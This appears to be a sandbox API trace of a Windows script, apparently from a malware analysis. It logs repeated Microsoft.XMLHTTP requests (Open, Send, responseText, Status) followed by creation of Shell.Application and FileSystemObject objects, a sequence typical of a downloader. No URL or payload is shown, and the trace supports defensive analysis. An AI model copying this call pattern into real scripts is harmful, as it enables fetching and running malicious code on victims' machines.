	[0423.154] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0423.154] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0423.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0423.154] ??2@YAPEAX_K@Z () returned 0x62f330
	[0423.154] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62f330) 
	[0423.154] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0423.154] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0423.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0423.154] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0423.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.154] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0423.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0423.154] longjmp () 
	[0423.154] longjmp () 
	[0423.155] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0423.155] SysStringLen (param_1=0x0) returned 0x0
	[0423.155] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0423.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0423.155] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0423.155] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0423.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0423.155] ??2@YAPEAX_K@Z () returned 0x62f310
	[0423.155] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f310) 
	[0423.155] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0423.155] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0423.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0423.155] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0423.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.155] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0423.155] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0423.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.156] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0423.156] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0424.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0424.590] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0424.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0424.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0424.590] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0424.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0424.590] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0424.591] SysStringLen (param_1=0x0) returned 0x0
	[0424.591] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0424.591] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0424.591] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0424.591] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0424.591] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0424.591] ??2@YAPEAX_K@Z () returned 0x62f350
	[0424.591] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0424.591] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0424.591] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0424.591] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0424.591] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0424.591] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0424.591] SysStringLen (param_1=0x0) returned 0x0
	[0424.591] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0424.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0424.595] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0424.595] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0424.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0424.595] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0424.595] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0425.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0425.514] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0425.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0425.515] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0425.515] SysStringLen (param_1=0x0) returned 0x0
	[0425.515] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0425.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0425.516] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0425.516] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0425.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0425.516] ??2@YAPEAX_K@Z () returned 0x62f310
	[0425.516] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0425.516] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0425.516] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0425.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0425.516] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0425.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.516] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0425.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0425.518] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0425.518] SysStringLen (param_1=0x0) returned 0x0
	[0425.518] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0425.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0425.518] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0425.518] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0425.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0425.518] ??2@YAPEAX_K@Z () returned 0x62f330
	[0425.518] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0425.518] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0425.518] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0425.519] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0425.519] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0425.519] SysStringLen (param_1=0x0) returned 0x0
	[0425.519] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0425.519] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
